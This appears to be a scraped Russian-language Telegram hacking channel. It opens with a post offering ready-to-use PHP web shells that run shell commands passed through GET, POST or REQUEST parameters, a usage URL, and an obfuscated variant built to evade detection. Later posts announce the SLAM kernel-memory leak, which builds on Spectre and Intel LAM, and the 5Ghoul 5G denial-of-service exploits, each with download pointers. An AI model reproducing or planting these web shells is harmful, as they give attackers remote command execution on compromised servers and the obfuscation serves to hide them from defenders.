🔥10😱4👌3👍1
mini_PHP Payload
*
Usage :
Obfuscation :
*
<?=`$_GET[0]`?>
<?=`$_POST[0]`?>
<?=`{$_REQUEST['_']}`?>
*Usage :
bashorg.com/path/to/shell.php?0=command*
Obfuscation :
<?=$_="";$_="'";$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>🔥58👍9😱9👌6
🔥3👌2
This media is not supported in your browser
VIEW IN TELEGRAM
Тут туса и SLAM интересный
Помните атаки
Ну так вот, трое пацанов взяли проц i9-13900k, ubuntu с ядром 6.3, сделали эмуляцию intel LAM
смогли прочитать память ядра.
В общем этот вот
*
Почитать можно ТУТ
Скачать SLAM ТУТ
#proc
Помните атаки
Meltdown и Spectre (Intel, AMD, ARM, POWER) ? Ну так вот, трое пацанов взяли проц i9-13900k, ubuntu с ядром 6.3, сделали эмуляцию intel LAM
(в ядре 6.4 Linear Address Masking (intel LAM) уже есть ) и используя наработки Spectre смогли прочитать память ядра.
В общем этот вот
intel LAM позволил создать в и без того дырявой процессорной архитектуре дополнительный канал слива памяти прямо в жирные лапкиSpectre + Intel LAM = SLAM*
Почитать можно ТУТ
Скачать SLAM ТУТ
#proc
🔥27👍8👌3
Концепция (PoC)
смартфоны
CPE-маршрутизаторы
USB-модемы
5Ghoul — это семейство
+12 доступных эксплойтов
*
5ghoul-5g-nr-attacks
*
атаки 5G NR на:смартфоны
CPE-маршрутизаторы
USB-модемы
5Ghoul — это семейство
DoS-уязвимостей 5G на уровне реализации, затрагивающих мобильные платформы Qualcomm и MediaTek.+12 доступных эксплойтов
*
5ghoul-5g-nr-attacks
*
🔥13👍8😱3